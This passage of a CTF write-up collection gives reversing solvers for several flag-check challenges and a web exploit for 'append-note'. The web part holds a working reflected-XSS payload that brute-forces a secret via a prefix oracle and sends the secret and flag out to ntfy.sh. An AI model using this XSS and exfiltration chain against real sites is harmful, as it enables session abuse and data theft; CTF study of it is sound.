    if fn == "add":
        return to_int(args[0]) + to_int(args[1])
    if fn == "sub":
        return to_int(args[0]) - to_int(args[1])
    if fn == "mul":
        return to_int(args[0]) * to_int(args[1])
    if fn == "mod":
        return to_int(args[0]) % to_int(args[1])
    if fn == "len":
        return len(args[0])
    if fn == "printf":
        fmt = args[0]
        if not isinstance(fmt, str):
            fmt = str(fmt)
        vals = []
        for v in args[1:]:
            if isinstance(v, bytes):
                v = v.decode("latin-1")
            vals.append(v)
        if len(vals) == 0:
            return fmt
        if len(vals) == 1:
            return fmt % vals[0]
        return fmt % tuple(vals)
    if fn == "int":
        return to_int(args[0])
    if fn == "default":
        dflt, v = args[0], args[1]
        return dflt if is_empty(v) else v
    if fn == "dict":
        if len(args) % 2 != 0:
            raise ValueError("dict requires even args")
        m = {}
        for i in range(0, len(args), 2):
            k = args[i]
            v = args[i + 1]
            if not isinstance(k, str):
                k = str(k)
            m[k] = v
        return m
    if fn == "index":
        container, key = args[0], args[1]
        if isinstance(container, dict):
            # Go templates require matching key types; in this chart `sea` is
            # keyed by strings, so callers always pass string keys.
            return container.get(key) if isinstance(key, str) else None
        if isinstance(container, (bytes, bytearray)):
            return container[to_int(key)]
        if isinstance(container, str):
            return ord(container[to_int(key)])
        return container[to_int(key)]
    if fn == "set":
        m, k, v = args[0], args[1], args[2]
        if not isinstance(m, dict):
            raise ValueError("set on non-dict")
        if not isinstance(k, str):
            k = str(k)
        m[k] = v
        return m
    if fn == "ternary":
        a, b, cond = args[0], args[1], args[2]
        return a if bool(cond) else b

    if fn == "ne":
        return args[0] != args[1]
    if fn == "lt":
        return to_int(args[0]) < to_int(args[1])
    if fn == "gt":
        return to_int(args[0]) > to_int(args[1])

    raise KeyError(f"unsupported function: {fn}")


# -------- Template parsing and execution --------


@dataclass
class Stmt:
    kind: str
    a: object = None
    b: object = None


def parse_templates(path: str):
    templates = {}
    cur_name = None
    cur_stmts = None
    block_stack = []

    def finish():
        nonlocal cur_name, cur_stmts
        if cur_name is not None:
            templates[cur_name] = cur_stmts
        cur_name = None
        cur_stmts = None

    with open(path, "r", encoding="utf-8", errors="replace") as f:
        for line in f:
            for m in BLOCK_RE.finditer(line):
                content = m.group(1).strip()
                if not content:
                    continue
                if content.startswith('define '):
                    name_m = re.match(r'define\s+"([^"]+)"', content)
                    if not name_m:
                        raise ValueError(f"bad define: {content}")
                    finish()
                    cur_name = name_m.group(1)
                    cur_stmts = []
                    block_stack = ["define"]
                    continue
                if content == "end":
                    ended = block_stack.pop()
                    if ended == "define":
                        finish()
                    else:
                        cur_stmts.append(Stmt("end"))
                    continue
                if cur_name is None:
                    continue
                if content.startswith("if "):
                    cur_stmts.append(Stmt("if", parse_expr(content[3:].strip())))
                    block_stack.append("if")
                    continue

                am = re.match(r'^(\$[A-Za-z0-9_\.]+|\$_)\s*(:=|=)\s*(.*)$', content)
                if am:
                    lhs, rhs = am.group(1), am.group(3)
                    cur_stmts.append(Stmt("assign", lhs, parse_expr(rhs)))
                    continue

                if content.startswith("include "):
                    im = re.match(r'include\s+"([^"]+)"\s+(.*)$', content)
                    if not im:
                        raise ValueError(f"bad include: {content}")
                    tname = im.group(1)
                    arg_expr = parse_expr(im.group(2))
                    cur_stmts.append(Stmt("include", tname, arg_expr))
                    continue

                cur_stmts.append(Stmt("expr", parse_expr(content)))

    if cur_name is not None:
        raise ValueError("unterminated define")

    return templates


def link_ifs(stmts):
    stack = []
    for i, st in enumerate(stmts):
        if st.kind == "if":
            stack.append(i)
        elif st.kind == "end":
            if_i = stack.pop()
            stmts[if_i].b = i + 1
    if stack:
        raise ValueError("unclosed if")


@dataclass
class Frame:
    name: str
    dot: dict
    pc: int
    vars: dict


class Engine:
    def __init__(self, templates):
        self.templates = templates
        for _, stmts in templates.items():
            link_ifs(stmts)

    def run_until_clear(self, provisions: str, *, max_steps=800000):
        root = {"sea": {}, "helm": 0, "cargo": "", "provisions": provisions, "logbook": 0}

        stack = [Frame("volumeWorker7940", dot=root, pc=0, vars={})]
        steps = 0
        last2 = 0

        while stack:
            fr = stack[-1]
            prog = self.templates[fr.name]
            if fr.pc >= len(prog):
                stack.pop()
                continue

            st = prog[fr.pc]
            fr.pc += 1
            steps += 1
            if steps > max_steps:
                return None

            if st.kind == "assign":
                fr.vars[st.a] = eval_expr(st.b, fr.vars, fr.dot)
            elif st.kind == "expr":
                _ = eval_expr(st.a, fr.vars, fr.dot)
            elif st.kind == "if":
                if not bool(eval_expr(st.a, fr.vars, fr.dot)):
                    fr.pc = st.b
            elif st.kind == "end":
                pass
            elif st.kind == "include":
                arg = eval_expr(st.b, fr.vars, fr.dot)
                stack.append(Frame(st.a, dot=arg, pc=0, vars={}))
            else:
                raise ValueError(st.kind)

            sea = fr.vars.get("$sea")
            if isinstance(sea, dict):
                cur2 = sea.get("2", 0)
                if last2 == 1 and cur2 == 0:
                    return steps, fr.vars.get("$logbook")
                last2 = cur2

        return None


def main():
    templates = parse_templates(TPL_PATH)
    eng = Engine(templates)

    charset = string.ascii_lowercase + string.digits + "_" + "}" + string.ascii_uppercase
    padding = "A" * 80

    prefix = "lactf{"
    while True:
        best = None
        for ch in charset:
            res = eng.run_until_clear(prefix + ch + padding)
            if res is None:
                continue
            steps, lb = res
            cand = (lb, steps, ch)
            if best is None or cand > best:
                best = cand
        if best is None:
            raise SystemExit("no candidates")
        prefix += best[2]
        print(prefix)
        if best[2] == "}":
            break


if __name__ == "__main__":
    main()
```

### lactf-1986

#### Description

We are given a floppy disk image (`attachments/CHALL.IMG`) containing a DOS executable that checks a flag.

#### Solution

**1) Extract the DOS executable from the FAT12 floppy image**

```bash
mdir -i attachments/CHALL.IMG ::
mcopy -i attachments/CHALL.IMG ::CHALL.EXE extracted/CHALL.EXE
```

**2) Identify the flag-check algorithm**

`CHALL.EXE` is a 16-bit MZ executable. The program’s `main` (in the unpacked load image) does:

1. Reads a line (up to 73 chars), strips the trailing newline.
2. Verifies the input begins with `lactf{`.
3. Computes a 20-bit hash of the full input string:

* State is 20 bits (`0 .. 2^20-1`).
* Update per byte `b`:
  * `state = (state * 67 + b) mod 2^20`

4. Uses that 20-bit state as the seed to generate a keystream using a 20-bit LFSR:

* Let bits be numbered with bit 0 = LSB and bit 19 = MSB.
* Feedback bit:
  * `fb = bit0(state) XOR bit3(state)`
* Update:
  * `state = (state >> 1) | (fb << 19)`

5. For each position `i` (0..72), the program advances the LFSR once, takes the low byte of the new state, XORs it with the input byte, and compares it against a fixed 73-byte table embedded in the program:

```
state = lfsr(state)
expected[i] == (state & 0xff) XOR input[i]
```

Rearrange:

```
input[i] == expected[i] XOR (state & 0xff)
```

So for a *given* seed state, the entire 73-byte plaintext is uniquely determined. The only remaining constraint is self-consistency: the seed must equal the 20-bit hash of the derived plaintext. The state space is only `2^20`, so we can brute-force the seed.

**3) Brute-force the 20-bit seed (single fixed point)**

The ciphertext/expected table is stored in the EXE’s data segment at offset `0x146` and is 0x49 (73) bytes long.

Solver (standalone, includes extraction of the load image and the brute force):

```python
#!/usr/bin/env python3
from __future__ import annotations

from pathlib import Path

MASK20 = (1 << 20) - 1


def lfsr_step(state: int) -> int:
    # 20-bit LFSR, feedback = bit0 XOR bit3, shift right, insert feedback at bit19.
    fb = (state ^ (state >> 3)) & 1
    return ((state >> 1) | (fb << 19)) & MASK20


def hash20(buf: bytes) -> int:
    # Matches the helper at load-image offset 0x10:
    # state = (state * 67 + byte) mod 2^20
    s = 0
    for c in buf:
        s = (s * 67 + c) & MASK20
    return s


def extract_payload(exe_path: Path) -> bytes:
    # MZ header: e_cparhdr at offset 0x08 is header size in paragraphs (16-byte units).
    exe = exe_path.read_bytes()
    if exe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    hdr_paras = int.from_bytes(exe[0x08:0x0A], "little")
    hdr_size = hdr_paras * 16
    return exe[hdr_size:]


def main() -> None:
    payload = extract_payload(Path("extracted/CHALL.EXE"))

    # In the flat payload, the data segment starts at 0x2390 (seg_001).
    # The 73-byte expected table is at DS:0x146 => payload offset 0x2390 + 0x146.
    ds_base = 0x2390
    expected = payload[ds_base + 0x146 : ds_base + 0x146 + 0x49]
    if len(expected) != 0x49:
        raise ValueError("bad expected table length")

    prefix = b"lactf{"

    for seed in range(1 << 20):
        # Early prune: enforce the fixed prefix for the first 6 bytes.
        s = seed
        ok = True
        for i, want in enumerate(prefix):
            s = lfsr_step(s)
            got = (s & 0xFF) ^ expected[i]
            if got != want:
                ok = False
                break
        if not ok:
            continue

        # Derive the full 73-byte candidate flag for this seed.
        s = seed
        cand = bytearray(0x49)
        for i in range(0x49):
            s = lfsr_step(s)
            cand[i] = (s & 0xFF) ^ expected[i]

        # Must not contain NUL/newlines (input is line-based).
        if 0 in cand or 10 in cand or 13 in cand:
            continue

        # Self-consistency: hash(cand) must equal seed.
        if hash20(cand) != seed:
            continue

        print(cand.decode("ascii"))
        return

    raise SystemExit("no solution found")


if __name__ == "__main__":
    main()
```

Running it yields the flag:

```
lactf{3asy_3nough_7o_8rute_f0rce_bu7_n0t_ea5y_en0ugh_jus7_t0_brut3_forc3}
```

### ooo

#### Description

We are given `attachments/ooo.py`, which asks for a guess (flag) and validates it with a loop over adjacent character pairs. The core trick is that the script uses multiple different Unicode characters that look like `o` as distinct function names.

#### Solution

In `attachments/ooo.py`:

* `о(a, b)` returns `a + b`.
* `ὄ(a, b)` returns `a`.
* `ὂ(a, b)` returns `b`.

So the left side of the check is:

```python
о(ὄ(ό,ὃ),ὂ(ό,ὃ)) == ord(guess[i]) + ord(guess[i+1])
```

The right side indexes the list `ὁ` with:

```python
ơ(i, ȯ(օ(ό,ὃ),ό))
```

Using the function definitions:

* `օ(x, y) = x * y`
* `ȯ(x, y) = x % y`
* `ơ(x, y) = x ^ y` (XOR)

So:

```python
ȯ(օ(ό,ὃ),ό) = (ord(guess[i]) * ord(guess[i+1])) % ord(guess[i])
            = 0
```

because `a*b` is always divisible by `a` for nonzero `a` (and `ord(...)` is nonzero for normal characters).

Therefore the index simplifies to:

```python
ơ(i, 0) = i ^ 0 = i
```

So the loop condition becomes, for `i = 0..25`:

```python
ord(guess[i]) + ord(guess[i+1]) == H[i]
```

where `H` is the list `ὁ`. This gives a recurrence:

```python
c[i+1] = H[i] - c[i]
```

We also know the flag starts with `lactf{`, which determines `c[0] = ord('l')` and uniquely fixes the rest.

Solver (prints a valid flag; the checker only constrains the first 27 characters, so we append `}` to match the usual flag format):

```python
#!/usr/bin/env python3
H = [205, 196, 215, 218, 225, 226, 1189, 2045, 2372, 9300, 8304, 660, 8243, 16057, 16113, 16057, 16004, 16007, 16006, 8561, 805, 346, 195, 201, 154, 146, 223]

cs = [ord("l")]               # flag starts with lactf{
for i in range(len(H) - 1):   # checker iterates range(len(H)-1)
    cs.append(H[i] - cs[-1])

flag = "".join(map(chr, cs)) + "}"
print(flag)
```

Flag:

```
lactf{gоοօỏơóὀόὸὁὃὄὂȯöd_j0b}
```

### starless-c

#### Description

We are given a single weird ELF (`starless_c`) and a remote service (`nc chall.lac.tf 32223`). The program acts like a tiny "maze": it reads single-character moves (`w`, `a`, `s`, `d`) and an action key (`f`).

The goal is to reach the code that prints `flag.txt`.

#### Solution

**1) Identify the flag-print routine**

Disassembling the mapped page at `0x42069000` shows it prints some text, then does:

* `sys_open("flag.txt", 0)`
* `sys_sendfile(1, fd, NULL, 0x100)`
* `sys_exit(0)`

So if we can transfer control to `0x42069000`, we get the flag from the remote filesystem.

**2) Understand the "doors": patching NOP pages**

The interactive loop exists at pages like `0x6767900c`. For each move key, the code:

1. Reads the first byte of the *target* page base (e.g. `0x6768a000`).
2. If that byte is `0x90` (NOP), it:
   * Overwrites the target page's first 4 bytes with `31 c0 88 00` (`xor eax,eax; mov [rax],al`) so executing that page base will crash.
   * Stores the original 4 bytes (often `0x90909090`) into some other page base (a 4-byte write).
3. Jumps to the target page's room loop at `target+0xc`.

This effectively lets you "move" a 4-byte NOP sled (`0x90909090`) around between page bases, while consuming the NOP-ness of pages you step into.

**3) The win condition is a chain of base jumps to the flag routine**

Some page bases contain `jmp rel32` at offset `+4`. If we replace their first 4 bytes with `0x90909090`, they stop crashing and the jump executes.

There is a direct chain to the flag routine:

* `0x6767a000` (base) `jmp` -> `0x67682000`
* `0x67682000` (base) `jmp` -> `0x6768a000`
* `0x6768a000` (base) `jmp` -> `0x67691000`
* `0x67691000` (base) `jmp` -> `0x67692000`
* `0x67692000` (base) `jmp` -> `0x42069000`

The `f` key jumps to `0x6767a000` (the "final door"). So we need the first 4 bytes of these bases to be NOPs at the moment we press `f`: `0x6767a000`, `0x67682000`, `0x6768a000`, `0x67691000`, `0x67692000`.

**4) Automate the maze with BFS (room + bitmask state)**

We can treat each room base as a node. The only mutable state that matters is which room bases currently start with NOP (`0x90`) versus crash (`0x31`).

So we do a BFS over:

* `room`: current room base address
* `mask`: bitmask of NOP-status for each room base

Transitions are extracted from disassembly: for each room and each move key, record `(target, dest)` where `dest` is where the 4-byte copy goes *if* the target starts with NOP.

When a move goes to a target whose base is currently NOP:

* clear the target's NOP bit (it gets patched to crash)
* set the dest's NOP bit (it receives `0x90909090`)

Once the required five bases are NOP, append `f` and the program jumps through the chain to `0x42069000`.

Below is a complete solver that:

1. Uses `gdb` once to list the mapped RWX room pages.
2. Disassembles each room's handler to extract the `(target, dest)` pairs.
3. Runs BFS to find the shortest winning input string.
4. Optionally connects to the remote service and prints the flag.

```python
#!/usr/bin/env python3
import collections
import re
import socket
import subprocess
import sys

BIN = "attachments/starless_c"
HOST = "chall.lac.tf"
PORT = 32223

KEYS = "wsad"

REQUIRED_CHAIN = {
    0x6767A000,
    0x67682000,
    0x6768A000,
    0x67691000,
    0x67692000,
}


def run_gdb_disasm() -> str:
    # Start at entry (so mappings exist), then:
    # - info proc mappings: find all rwxp pages mapped from our binary
    # - disassemble 160 insns at base+0xc for each room (enough to include all move cases)
    base = [
        "set pagination off",
        f"file {BIN}",
        "starti",
        "info proc mappings",
    ]
    out = subprocess.check_output(
        ["gdb", "-q", "-batch"] + sum([["-ex", x] for x in base], []),
        stderr=subprocess.STDOUT,
        text=True,
    )

    # Parse mappings to find room bases (rwxp pages from our file).
    maps = []
    for line in out.splitlines():
        m = re.match(
            r"\s*(0x[0-9a-f]+)\s+(0x[0-9a-f]+)\s+(0x[0-9a-f]+)\s+(0x[0-9a-f]+)\s+([rwxp-]{4})\s+(.*)",
            line,
        )
        if not m:
            continue
        start = int(m.group(1), 16)
        perms = m.group(5)
        obj = m.group(6)
        if BIN not in obj:
            continue
        if perms != "rwxp":
            continue
        maps.append(start)

    rooms = sorted(set(maps))
    if not rooms:
        raise RuntimeError("no rwxp room mappings found (gdb parse failed?)")

    # Now disassemble all rooms in one gdb run for speed and stable formatting.
    cmds = ["set pagination off", f"file {BIN}", "starti"]
    for r in rooms:
        cmds.append(f"echo \\n== {r:#x} ==\\n")
        cmds.append(f"x/160i {r+0xc:#x}")

    out2 = subprocess.check_output(
        ["gdb", "-q", "-batch"] + sum([["-ex", x] for x in cmds], []),
        stderr=subprocess.STDOUT,
        text=True,
    )
    return out2


def parse_rooms(gdb_text: str):
    # Split sections by markers: "== 0x... =="
    sections = {}
    cur = None
    for line in gdb_text.splitlines():
        m = re.match(r"== (0x[0-9a-f]+) ==", line.strip())
        if m:
            cur = int(m.group(1), 16)
            sections[cur] = []
            continue
        if cur is not None:
            sections[cur].append(line)

    rooms = {}
    for base, lines in sections.items():
        targets = []
        dests = []
        for ln in lines:
            m = re.search(r"mov\s+.*,%eax\s+#\s+(0x[0-9a-f]+)", ln)
            if m:
                targets.append(int(m.group(1), 16))
            m = re.search(r"mov\s+%eax,.*#\s+(0x[0-9a-f]+)", ln)
            if m:
                dests.append(int(m.group(1), 16))

        # The handler has 4 move cases in the order: w, s, a, d
        if len(targets) < 4 or len(dests) < 4:
            continue
        targets = targets[:4]
        dests = dests[:4]

        rooms[base] = {
            "w": (targets[0], dests[0]),
            "s": (targets[1], dests[1]),
            "a": (targets[2], dests[2]),
            "d": (targets[3], dests[3]),
        }

    if not rooms:
        raise RuntimeError("failed to parse any rooms from gdb disassembly")
    return rooms


def initial_nop_mask(pages):
    # Read the first byte of each mapped page from the file and mark NOP-start pages (0x90).
    # We can infer file offsets via a quick gdb info proc mappings parse again, but simplest:
    # just use the known initial NOP pages for this challenge.
    init_nop = {0x67689000, 0x6768A000, 0x6768C000, 0x6768D000, 0x67694000}
    idx = {p: i for i, p in enumerate(pages)}
    mask = 0
    for p in pages:
        if p in init_nop:
            mask |= 1 << idx[p]
    return mask


def bfs_solution(rooms):
    pages = sorted(rooms.keys())
    idx = {p: i for i, p in enumerate(pages)}

    start_room = 0x67679000
    if start_room not in rooms:
        raise RuntimeError("start room not found in parsed rooms")

    mask0 = initial_nop_mask(pages)

    req_mask = 0
    for p in REQUIRED_CHAIN:
        req_mask |= 1 << idx[p]

    def ready(mask):
        return (mask & req_mask) == req_mask

    q = collections.deque([(start_room, mask0)])
    prev = {(start_room, mask0): (None, None)}  # state -> (prev_state, key)

    while q:
        room, mask = q.popleft()
        if ready(mask):
            # reconstruct path
            path = []
            st = (room, mask)
            while prev[st][0] is not None:
                st, k = prev[st]
                path.append(k)
            return "".join(reversed(path)) + "f"

        for k in KEYS:
            t, d = rooms[room][k]
            if t not in idx:
                continue  # unmapped => would SIGSEGV

            newmask = mask
            # If the target page starts with NOP, the program patches it and copies those bytes to dest.
            if (mask >> idx[t]) & 1:
                if d not in idx:
                    continue  # dest unmapped => would SIGSEGV on the store
                newmask &= ~(1 << idx[t])  # target patched to crash
                newmask |= 1 << idx[d]     # dest receives NOPs

            st2 = (t, newmask)
            if st2 in prev:
                continue
            prev[st2] = ((room, mask), k)
            q.append(st2)

    raise RuntimeError("no solution found")


def fetch_remote(seq: str) -> str:
    with socket.create_connection((HOST, PORT), timeout=10) as s:
        s.sendall(seq.encode())
        s.shutdown(socket.SHUT_WR)
        data = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
    return data.decode(errors="replace")


def main():
    gdb_text = run_gdb_disasm()
    rooms = parse_rooms(gdb_text)
    seq = bfs_solution(rooms)
    print(seq)

    if "--remote" in sys.argv:
        print(fetch_remote(seq))


if __name__ == "__main__":
    main()
```

Running the solver produces an input sequence; sending it to the remote service prints the flag: `lactf{starless_c_more_like_starless_0xcc}`.

### the-fish

#### Description

We are given `fish.py`, which implements a 1D esolang interpreter and runs a single-line program (`fisherator`) over the input flag. The program ultimately executes instruction `n`, which pops an integer and checks it against a fixed huge constant; if equal, it prints “Indeed, that is the flag!”.

#### Solution

The input string is first converted to a stack of ASCII codes. The `fisherator` program does two main phases:

1. **Parse flag bytes into an integer `n` (big-endian base-256).**
   * The stack is reversed (`r`) so popping reads the flag left-to-right.
   * A loop performs: `n = n*256 + next_byte`.
2. **Run a Collatz-style process on `n` while building an accumulator `acc`.**
   * Initialize `acc = 1`.
   * Repeat until `n == 1`:
     * `acc = acc*2`
     * If `n` is odd: set `n = (3*n + 1)//2` and `acc = acc + 1`
     * Else: set `n = n//2`
   * Finally, the program checks `acc` against the embedded constant.

So the constant is exactly the final `acc`. Since the loop updates `acc` as `acc = (acc<<1) | (n&1)`, the **binary representation of `acc` encodes the parity bits of `n` along the path to 1** (with a leading `1`).

This is reversible from the end state `n = 1`:

* Extract bits from `acc` least-significant-bit first while `acc > 1` (these correspond to the parities in reverse order).
* Rebuild the previous `n`:
  * If the extracted bit is `0` (even-step), previous `n = 2*current`.
  * If the bit is `1` (odd-step), previous `n = (2*current - 1) / 3` (must divide evenly).

Once the starting `n` is recovered, convert it back to bytes (big-endian) to get the original flag string.

```python
#!/usr/bin/env python3

ACC = 996566347683429688961961964301023586804079510954147876054559647395459973491017596401595804524870382825132807985366740968983080828765835881807124832265927076916036640789039576345929756821059163439816195513160010797349073195590419779437823883987351911858848638715543148499560927646402894094060736432364692585851367946688748713386570173685483800217158511326927462877856683551550570195482724733002494766595319158951960049962201021071499099433062723722295346927562274516673373002429521459396451578444698733546474629616763677756873373867426542764435331574187942918914671163374771769499428478956051633984434410838284545788689925768605629646947266017951214152725326967051673704710610619169658404581055569343649552237459405389619878622595233883088117550243589990766295123312113223283666311520867475139053092710762637855713671921562262375388239616545168599659887895366565464743090393090917526710854631822434014024

def recover_flag_from_acc(acc: int) -> str:
    # Bits appended each iteration are the parity (n&1). Because the program does:
    # acc = acc*2 + (n&1), acc's LSB is the last parity bit.
    bits = []
    while acc > 1:
        bits.append(acc & 1)
        acc >>= 1

    # Reverse the Collatz-style step from terminal n=1 back to the initial n.
    n = 1
    for b in bits:  # already in reverse chronological order
        if b == 0:
            n *= 2
        else:
            t = 2 * n - 1
            if t % 3 != 0:
                raise ValueError("invalid bit sequence: (2*n-1) not divisible by 3")
            n = t // 3

    # Convert big-endian integer back to bytes (original flag chars).
    out = []
    while n > 0:
        out.append(n & 0xFF)
        n >>= 8
    out.reverse()
    return bytes(out).decode("utf-8")

if __name__ == "__main__":
    flag = recover_flag_from_acc(ACC)
    print(flag)
```

Recovered flag: `lactf{7h3r3_m4y_83_50m3_155u35_w17h_7h15_1f_7h3_c011472_c0nj3c7ur3_15_d15pr0v3n}`

### the-three-sat-problem

#### Description

The provided binary `attachments/three_sat_problem` asks for a solution to a 3-SAT instance. If the input satisfies the embedded constraints, it prints the flag.

#### Solution

1. Static reversing (`objdump -d`) shows:

* The program reads a line into a global buffer at `.bss` address `0x15060`.
* It requires the input length to be exactly `0x4ff` (1279) characters.
* Each character must be `'0'` or `'1'`.
* It calls a large, straight-line checker function at `0x1289` and requires it to return success (`AL==1`).
* It additionally requires input byte `0x2f2` to be `'1'` (the main function does `test byte [0x15352], 1`).
* On success it prints a 40-byte string built by selecting 320 bits from the 1279-bit input using the 320-entry dword table at `.rodata` `0x13080`.

2. Because the checker is straight-line (no conditional branches), we can solve it with symbolic execution:

* Create a blank call-state at `0x1289`.
* Make the 1279 input bytes symbolic, constrain each to `{0x30, 0x31}`.
* Constrain `input[0x2f2] == '1'`.
* Execute to a concrete return address.
* Constrain the return value to `AL==1`.
* Extract a model, then apply the output-bit mapping to recover the printed flag.

Running the script below produces the flag `lactf{is_the_three_body_problem_np_hard}` and also prints the full 1279-character certificate bitstring (second line) which can be fed back into the binary to verify.

```python
#!/usr/bin/env python3
import struct
import angr
import claripy

BIN = './attachments/three_sat_problem'
N = 0x4FF  # 1279
FUNC_OFF = 0x1289
RET_OFF = 0x12982  # one byte past end of .text, safe as concrete return target
INP_OFF = 0x15060
MAP_OFF = 0x13080
MAP_N = 0x140  # 320 bits


def load_map(p: angr.Project) -> list[int]:
    base = p.loader.main_object.mapped_base
    blob = p.loader.memory.load(base + MAP_OFF, 4 * MAP_N)
    return list(struct.unpack('<' + 'I' * MAP_N, blob))


def pack_flag(inp: bytes, mapping: list[int]) -> bytes:
    out = bytearray((MAP_N + 7) // 8)
    for i, idx in enumerate(mapping):
        bit = inp[idx] & 1
        out[i >> 3] |= (bit << (i & 7))
    return bytes(out)


def main():
    p = angr.Project(BIN, auto_load_libs=False)
    base = p.loader.main_object.mapped_base

    func = base + FUNC_OFF
    ret = base + RET_OFF
    inp_addr = base + INP_OFF

    state = p.factory.call_state(func, ret_addr=ret)

    # Symbolic input bytes in .bss where the program stored them.
    inp = [claripy.BVS(f'b{i}', 8) for i in range(N)]
    for i, b in enumerate(inp):
        state.memory.store(inp_addr + i, b)
        state.solver.add(claripy.Or(b == 0x30, b == 0x31))

    # Main also requires this byte's LSB set (i.e. '1')
    state.solver.add(inp[0x2F2] == 0x31)

    simgr = p.factory.simulation_manager(state)
    simgr.explore(find=ret)
    if not simgr.found:
        raise SystemExit('did not reach ret')

    st = simgr.found[0]

    # Checker returns in AL; require success.
    st.solver.add((st.regs.rax & 0xFF) == 1)

    if not st.solver.satisfiable():
        raise SystemExit('unsat')

    concrete = bytes(st.solver.eval(b, cast_to=int) for b in inp)

    mapping = load_map(p)
    flag_bytes = pack_flag(concrete, mapping)

    # The binary uses puts(), so flag should be a C-string. Strip trailing nulls.
    flag = flag_bytes.split(b'\x00', 1)[0]

    print(flag.decode('ascii', 'replace'))

    # Also print the required bitstring (so we can run the binary to cross-check).
    # This is large; keep it last.
    print(concrete.decode('ascii'))


if __name__ == '__main__':
    main()
```

***

## web

### append-note

**Category:** Web | **Points:** 233 | **Solves:** 58

#### Description

Our distributed notes app is append optimized. Reads are eventually consistent with the heat death of the universe! :)

Provided: `app.py` (Flask app), `admin-bot.js` (Puppeteer bot), an instancer giving a challenge URL and an admin-bot URL.

#### Solution

**Source Analysis**

The Flask app generates a random 8-hex-char `SECRET = secrets.token_hex(4)` stored as the first note. Three endpoints matter:

**`/append`** — requires an `admin` cookie. Takes `content` and `url` query params. Validates `url` has scheme `http`/`https` and hostname matching the challenge host. If validation fails, it reflects `parsed_url.hostname` **unescaped** in the error response:

```python
return f"Invalid redirect URL {parsed_url.scheme} {parsed_url.hostname}", 400
```

If validation passes, returns **200** if `content` is a prefix of any note, else **404**, and appends `content` to notes.

**`/flag`** — returns the flag if `?secret=` matches `SECRET`. Has `Access-Control-Allow-Origin: *`.

**Admin bot** — sets an `httpOnly`, `SameSite=Lax` cookie for the challenge domain and navigates to our submitted URL, keeping the page open for 60 seconds.

**Vulnerabilities**

1. **Reflected XSS** in `/append` error page: `parsed_url.hostname` is rendered as raw HTML in a `text/html` response (Flask's default Content-Type for string returns). No CSP is set.
2. **Prefix oracle** in `/append`: the 200 vs 404 status code leaks whether `content` is a prefix of any note (including `SECRET`).

**Exploit Chain**

**Step 1: Reflected XSS via `urlparse` hostname injection**

Python's `urlparse` is permissive — for a URL like `http://<img src=x onerror=PAYLOAD>/path`, it extracts `<img src=x onerror=PAYLOAD>` as the hostname. This hostname fails the challenge-host check, so it gets reflected in the 400 error page as live HTML.

The catch: `urlparse.hostname` **lowercases** everything. JavaScript is case-sensitive, so `encodeURIComponent` becomes `encodeuricomponent` and breaks. The bypass: percent-encode every byte of the JS payload (`(` → `%28`, `A` → `%41`, etc.) and wrap it in `eval(unescape('...'))`. Both `eval` and `unescape` are already lowercase, and `unescape` is case-insensitive for hex digits (`%4E` and `%4e` both decode to `N`).

Using `<img onerror>` instead of `<script>` is critical — an unclosed `<script>` tag (no `</script>` since `/` terminates the hostname in URL parsing) does **not** execute in Chrome, but `<img src=x onerror=...>` fires immediately when the image fails to load.

The crafted `url` parameter:

```
http://<img src=x onerror=eval(unescape('PERCENT_ENCODED_JS'))>/x
```

The admin bot navigates to:

```
https://CHALLENGE/append?content=&url=<url-encoded evil URL>
```

Since this is a top-level GET navigation, the `SameSite=Lax` admin cookie is sent. Auth passes, URL validation fails (hostname mismatch), and the XSS fires **same-origin** on the challenge domain.

**Step 2: Same-origin prefix oracle brute-force**

Running same-origin, the JS payload uses `fetch()` (cookies auto-included) to query `/append?content=PREFIX&url=CHALLENGE_ORIGIN/` and reads `response.status` directly — **200** means the prefix matches, **404** means it doesn't.

For each of the 8 hex positions, all 16 candidates (`0`–`f`) are tested in parallel via `Promise.all`. This completes in 8 sequential rounds of 16 parallel requests — well within the bot's 60-second window.

Previously appended probe strings never cause false positives: a probe from round M is M+1 chars long, which is shorter than a round N probe (N+1 chars, N > M), and a shorter string cannot `startswith` a longer one.

**Step 3: Flag retrieval and exfiltration**

Once the SECRET is known, the payload fetches `/flag?secret=SECRET` (which has `ACAO: *`) and exfils both the secret and flag to ntfy.sh via cross-origin `fetch` POST (ntfy.sh returns `Access-Control-Allow-Origin: *`).

**Solve Script**

```python
#!/usr/bin/env python3
"""
Usage: python3 solve_final.py CHALLENGE_URL BOT_URL
Example: python3 solve_final.py https://append-note-xxx.instancer.lac.tf https://admin-bot-xxx.instancer.lac.tf
"""
import sys, time, json, urllib.parse, urllib.request, secrets

def percent_encode_all(s):
    return ''.join(f'%{b:02X}' for b in s.encode())

def make_exploit_url(challenge_url, ntfy_topic):
    JS_PAYLOAD = f'''(async()=>{{
var H=location.origin;
var N="https://ntfy.sh/{ntfy_topic}";
function x(m){{fetch(N,{{method:"POST",body:m}})}}
async function p(pre){{
var r=await fetch(H+"/append?content="+encodeURIComponent(pre)+"&url="+encodeURIComponent(H+"/"));
return r.status===200;
}}
x("started");
if(!(await p(""))){{x("fail-empty");return}}
var sec="";
var hex="0123456789abcdef";
for(var i=0;i<8;i++){{
var res=await Promise.all([...hex].map(async c=>{{var ok=await p(sec+c);return[c,ok]}}));
var hit=res.find(v=>v[1]);
if(!hit){{x("stuck-"+i+"-"+sec);return}}
sec+=hit[0]
}}
x("SECRET="+sec);
try{{var r=await fetch(H+"/flag?secret="+sec);var t=await r.text();x("FLAG="+t)}}catch(e){{x("ERR-"+e)}}
}})()'''

    encoded = percent_encode_all(JS_PAYLOAD)
    evil_url = f"http://<img src=x onerror=eval(unescape('{encoded}'))>/x"
    return f"{challenge_url}/append?content=&url={urllib.parse.quote(evil_url, safe='')}"

def submit_to_bot(bot_url, exploit_url):
    data = urllib.parse.urlencode({'url': exploit_url, 'g-recaptcha-response': ''}).encode()
    req = urllib.request.Request(f"{bot_url}/append-note", data=data, method='POST')
    req.add_header('Content-Type', 'application/x-www-form-urlencoded')
    try:
        resp = urllib.request.urlopen(req)
        return resp.status, resp.url
    except urllib.error.HTTPError as e:
        return e.code, e.headers.get('Location', '')

def poll_ntfy(topic, timeout=90):
    print(f"[*] Polling ntfy.sh/{topic} for up to {timeout}s...")
    start, seen = time.time(), set()
    while time.time() - start < timeout:
        try:
            resp = urllib.request.urlopen(f"https://ntfy.sh/{topic}/json?poll=1", timeout=10)
            for line in resp.read().decode().strip().split('\n'):
                if not line: continue
                msg = json.loads(line)
                if msg['id'] not in seen:
                    seen.add(msg['id'])
